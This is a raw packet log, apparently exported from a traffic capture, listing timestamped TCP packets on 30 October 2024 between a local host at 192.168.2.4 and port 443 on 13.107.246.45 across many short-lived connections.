Oct 30, 2024 03:47:09.180003881 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.180069923 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.180097103 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.180109024 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.180119038 CET49956443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.180123091 CET4434995613.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.182697058 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.182753086 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.182838917 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.183023930 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.183053017 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.266655922 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.266803980 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.266869068 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.266964912 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.266972065 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.266983032 CET49958443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.266985893 CET4434995813.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.269485950 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.269556046 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.269645929 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.269774914 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.269783020 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.301987886 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.302078962 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.302131891 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.302223921 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.302256107 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.302282095 CET49959443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.302294970 CET4434995913.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.304869890 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.304893970 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.304985046 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.305097103 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.305109024 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.781222105 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.781738997 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.781769037 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.782193899 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.782201052 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.902831078 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.903328896 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.903342009 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.903937101 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.903942108 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.914714098 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.914743900 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.914794922 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.914794922 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.914844036 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.915113926 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.915132999 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.915147066 CET49960443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.915153980 CET4434996013.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.918529034 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.918565035 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.918637037 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.918804884 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.918817997 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.956517935 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.957062960 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.957083941 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:09.957684994 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:09.957691908 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.007894039 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.008546114 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.008569956 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.009011030 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.009021997 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.032685041 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.032749891 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.032839060 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.033152103 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.033173084 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.033188105 CET49961443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.033195019 CET4434996113.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.036142111 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.036165953 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.036251068 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.036428928 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.036442041 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.042376041 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.048296928 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.048309088 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.048712969 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.048717022 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.099617004 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.099903107 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.100229025 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.100431919 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.100447893 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.100472927 CET49962443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.100480080 CET4434996213.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.103558064 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.103589058 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.103708029 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.103919029 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.103933096 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.140219927 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.140291929 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.140408039 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.140409946 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.140470982 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.145031929 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.145059109 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.145071983 CET49963443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.145078897 CET4434996313.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.148475885 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.148502111 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.148591995 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.148849010 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.148864985 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.340157032 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.340224028 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.340354919 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.340651035 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.340662003 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.340673923 CET49964443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.340678930 CET4434996413.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.343595982 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.343630075 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.343725920 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.343868971 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.343885899 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.691534042 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.692024946 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.692035913 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.692601919 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.692606926 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.787014961 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.788311958 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.788322926 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.788781881 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.788786888 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.829114914 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.829152107 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.829209089 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.829281092 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.829435110 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.829710960 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.829727888 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.829735994 CET49965443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.829744101 CET4434996513.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.833008051 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.833043098 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.833142042 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.833348989 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.833360910 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.835496902 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.835917950 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.835925102 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.836333990 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.836338997 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.903417110 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.903971910 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.903991938 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.904572010 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.904580116 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.920403004 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.920532942 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.920650959 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.920923948 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.920933962 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.920943975 CET49966443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.920948982 CET4434996613.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.924209118 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.924243927 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.924340963 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.924472094 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.924490929 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.963749886 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.963819027 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.964019060 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.964096069 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.964108944 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.964117050 CET49967443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.964121103 CET4434996713.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.967045069 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.967068911 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:10.967147112 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.967308998 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:10.967324018 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.035250902 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.035484076 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.035584927 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.035901070 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.035923958 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.035948038 CET49968443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.035957098 CET4434996813.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.039259911 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.039283991 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.039386988 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.039607048 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.039618969 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.086056948 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.086612940 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.086639881 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.087236881 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.087244034 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.219500065 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.219707012 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.219748974 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.219762087 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.219801903 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.219944000 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.219961882 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.219974995 CET49969443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.219984055 CET4434996913.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.223263025 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.223289013 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.223360062 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.223565102 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.223578930 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.572207928 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.572721004 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.572741032 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.573507071 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.573514938 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.660954952 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.661845922 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.661865950 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.662348032 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.662357092 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.701661110 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.701802015 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.701890945 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.702150106 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.702168941 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.702182055 CET49970443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.702188969 CET4434997013.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.705497026 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.705528021 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.705629110 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.705847025 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.705859900 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.709321976 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.709754944 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.709768057 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.710135937 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.710140944 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.788649082 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.789490938 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.789506912 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.789917946 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.789930105 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.790499926 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.790539026 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.790597916 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.790601015 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.790662050 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.790887117 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.790900946 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.790941954 CET49971443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.790947914 CET4434997113.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.793715000 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.793750048 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.793859005 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.794080973 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.794095039 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.867806911 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.867885113 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.867952108 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.868175983 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.868191004 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.868196964 CET49972443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.868201971 CET4434997213.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.871351004 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.871376991 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.871490955 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.871679068 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.871690989 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.923393011 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.923425913 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.923477888 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.923508883 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.923566103 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.923612118 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.923612118 CET49973443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.923624039 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.923631907 CET4434997313.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.926707983 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.926732063 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.926882982 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.927032948 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.927045107 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.952012062 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.952438116 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.952459097 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:11.953038931 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:11.953046083 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.083499908 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.083571911 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.083662033 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.083851099 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.083865881 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.083875895 CET49974443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.083880901 CET4434997413.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.088051081 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.088072062 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.088174105 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.088382959 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.088393927 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.426435947 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.428096056 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.428121090 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.428883076 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.428889036 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.542606115 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.543154955 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.543174982 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.543730974 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.543735981 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.559726954 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.559788942 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.559871912 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.560137987 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.560154915 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.560164928 CET49975443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.560168982 CET4434997513.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.563225031 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.563271046 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.563538074 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.563708067 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.563728094 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.641022921 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.641876936 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.641901970 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.642626047 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.642631054 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.665895939 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.666356087 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.666374922 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.667160034 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.667165041 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.675571918 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.675628901 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.678905964 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.678997040 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.679008961 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.679023981 CET49976443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.679028034 CET4434997613.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.682265997 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.682296991 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.682379007 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.682742119 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.682754993 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.775656939 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.776321888 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.776386023 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.776393890 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.776439905 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.776511908 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.776521921 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.776531935 CET49977443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.776535988 CET4434997713.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.779599905 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.779695034 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.779768944 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.779990911 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.780026913 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.793971062 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.794140100 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.794203043 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.794281960 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.794291973 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.794311047 CET49978443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.794316053 CET4434997813.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.797364950 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.797391891 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.797550917 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.797715902 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.797730923 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.852884054 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.853627920 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.853642941 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:12.854242086 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:12.854247093 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.167943954 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.167999983 CET4434997913.107.246.45192.168.2.4
